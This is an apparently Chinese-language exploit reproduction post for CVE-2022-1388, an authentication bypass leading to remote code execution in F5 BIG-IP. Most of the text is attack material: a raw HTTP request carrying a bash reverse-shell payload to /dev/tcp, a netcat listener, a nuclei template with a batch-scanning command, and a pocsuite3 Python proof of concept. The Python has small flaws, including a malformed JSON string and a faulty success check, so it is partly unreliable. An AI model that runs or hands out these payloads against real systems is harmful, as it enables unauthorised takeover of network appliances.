漏洞复现 CVE-2022-1388 F5 BIG-IP RCE

POST /mgmt/tm/util/bash HTTP/1.1Host: x.x.x.xContent-Length: 85Connection: Keep-Alive, X-F5-Auth-TokenCache-Control: max-age=0aX-F5-Auth-Token: aAuthorization: Basic YWRtaW46xxxxx=
{"command":"run","utilCmdArgs":"-c 'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'"}

nc -lnvp 7777

批量验证命令：nuclei -list 1.txt -t CVE-2022-1388.yaml
yaml POC：id: CVE-2022-1388
info:  name: F5 BIG-IP iControl REST Auth Bypass RCE  author: dwisiswant0  severity: critical  description: |    This vulnerability may allow an unauthenticated attacker    with network access to the BIG-IP system through the management    port and/or self IP addresses to execute arbitrary system commands,    create or delete files, or disable services. There is no data plane    exposure; this is a control plane issue only.  reference:    - https://twitter.com/GossiTheDog/status/1523566937414193153  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H    cvss-score: 9.80    cve-id: CVE-2022-1388    cwe-id: CWE-306  tags: cve
variables:  auth: "admin:"
requests:  - raw:      - |        POST /mgmt/tm/util/bash HTTP/1.1        Host: {{Hostname}}        Connection: keep-alive, X-F5-Auth-Token        X-F5-Auth-Token: a        Authorization: Basic {{base64(auth)}}        Content-Type: application/json
        {          "command": "run",          "utilCmdArgs": "-c 'echo ryaqkj'"        }
    matchers:      - type: word        words:          - "commandResult"          - "ryaqkj"        condition: and

使用方法：python3 cli.py -r pocs/CVE-2022-1388.py -f 1.txt
poc：# -*- coding:utf-8 -*-
from pocsuite3.api import Output, POCBase, register_poc, requests, loggerfrom pocsuite3.api import get_listener_ip, get_listener_portfrom pocsuite3.api import REVERSE_PAYLOADfrom urllib.parse import urljoinfrom pocsuite3.lib.utils import random_str

class DemoPOC(POCBase):    vulID = "CVE-2022-1388"    version ='F5 BIG-IP 16.x: 16.1.0 - 16.1.2'    author = ["ry"]    vulDate = "2022-05-18"    createDate = "2022-05-18"    updateDate = "2022-05-18"    references =["https://support.f5.com/csp/article/K23605346"]    name ="F5 BIG-IP RCE"    appPowerLink = ''    appName = 'F5 BIG-IP'    appVersion = '''BIG-IP 16.x: 16.1.0 - 16.1.2                    BIG-IP 15.x: 15.1.0 - 15.1.5                    BIG-IP 14.x: 14.1.0 - 14.1.4                    BIG-IP 13.x: 13.1.0 - 13.1.4                    BIG-IP 12.x: 12.1.0 - 12.1.6                    BIG-IP 11.x: 11.6.1 - 11.6.5'''    vulType = 'RCE'    desc = '''    F5 BIG-IP RCE    '''    samples = []    install_requires = ['']
    def _verify(self):        result = {}        path = "/mgmt/tm/util/bash"        url = urljoin(self.url,path)        payload = "{"command":"run","utilCmdArgs":"-c 'echo ryaqjk'"}"        headers = {                    'Content-Length': '54',                    'Connection': 'Keep-Alive, X-F5-Auth-Token',                    'Cache-Control': 'max-age=0a',                    'X-F5-Auth-Token': 'a',                    'Authorization': 'Basic YWRtaW46'                    }        rr = requests.post(url=url,headers=headers,data=payload)        try:            if "ryaqjk" and "commandResult" in rr.text:                result['VerifyInfo'] = {}                result['VerifyInfo']['URL'] = url                result['VerifyInfo']['Name'] = payload        except Exception as e:            pass        return self.parse_output(result)                    def parse_output(self, result):        output = Output(self)        if result:            output.success(result)        else:            output.fail('target is not vulnerable')        return output
    def _attack(self):        return self._verify()register_poc(DemoPOC)